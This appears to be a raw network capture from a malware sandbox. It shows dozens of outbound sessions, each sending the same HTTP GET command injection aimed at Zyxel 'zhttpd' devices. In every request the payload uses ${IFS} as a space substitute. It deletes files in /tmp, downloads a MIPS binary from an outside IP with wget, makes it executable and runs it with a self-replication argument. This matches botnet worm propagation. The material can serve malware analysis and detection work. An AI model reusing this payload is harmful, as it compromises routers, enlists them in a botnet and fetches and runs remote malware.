                                                Jan 12, 2024 18:24:23.539542913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1274192.168.2.1337172126.169.21.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539592981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1275192.168.2.1346158163.43.57.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539619923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1276192.168.2.134736462.24.158.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539648056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1277192.168.2.1333944148.86.45.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539701939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1278192.168.2.135461863.97.102.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539763927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1279192.168.2.1340046167.42.137.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539783955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1280192.168.2.134812080.0.55.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539800882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1281192.168.2.1356790154.188.111.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539828062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1282192.168.2.1336620113.199.98.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539851904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1283192.168.2.135547873.20.114.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539928913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1284192.168.2.134149637.175.216.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539953947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1285192.168.2.135496249.23.80.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540002108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1286192.168.2.1347984143.236.49.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540040016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1287192.168.2.133409834.31.179.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540090084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1288192.168.2.1356270152.7.220.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540123940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1289192.168.2.1349342135.63.144.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540168047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1290192.168.2.1349752113.34.133.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540210009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1291192.168.2.1353070212.92.64.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540240049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1292192.168.2.1347480153.127.126.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540276051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1293192.168.2.134118013.18.153.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540321112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1294192.168.2.134737012.209.236.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540363073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1295192.168.2.1348982119.247.161.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540396929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1296192.168.2.1356524162.241.159.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540417910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1297192.168.2.1351532155.155.251.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540467024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1298192.168.2.133328890.161.179.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540518045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1299192.168.2.1351172201.1.238.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540555000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1300192.168.2.1360998174.27.228.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540577888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1301192.168.2.133743858.36.237.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540627003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1302192.168.2.1356152182.9.202.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540658951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1303192.168.2.1334072219.95.89.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540698051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1304192.168.2.1335432200.65.154.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540726900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1305192.168.2.1336492182.208.53.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540790081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1306192.168.2.1355230201.59.13.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540834904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1307192.168.2.134967084.224.111.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540855885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1308192.168.2.1346326165.81.102.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540904999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1309192.168.2.1354426177.101.149.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540944099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1310192.168.2.1349948117.106.87.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.540966988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1311192.168.2.1354684213.136.225.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541023970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1312192.168.2.1337618171.113.12.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541054964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1313192.168.2.1338138107.151.41.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541112900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1314192.168.2.1339128170.222.248.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541143894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1315192.168.2.1337054166.168.21.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541177988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1316192.168.2.133352242.156.100.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541229010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1317192.168.2.134859685.224.92.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541270971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1318192.168.2.1335150160.58.81.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541296959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1319192.168.2.135004241.47.242.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541343927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1320192.168.2.1335908121.106.81.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541376114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1321192.168.2.135952466.108.228.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541420937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1322192.168.2.1338236223.40.138.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541471958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1323192.168.2.1352488131.247.188.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541490078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1324192.168.2.1341372138.24.190.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541539907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1325192.168.2.135373084.229.208.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541580915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1326192.168.2.1352282200.234.60.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541603088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1327192.168.2.134875631.216.107.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541657925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1328192.168.2.135655027.199.169.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541687012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1329192.168.2.1344716148.74.75.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541733980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1330192.168.2.1340620105.178.39.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541762114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1331192.168.2.1333056221.87.160.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541814089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1332192.168.2.1332970180.24.160.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541825056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1333192.168.2.133767024.98.75.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541878939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1334192.168.2.135618657.100.25.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541914940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1335192.168.2.135945892.89.217.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.541966915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1336192.168.2.1340130145.20.57.221443
                                                TimestampBytes transferredDirectionData
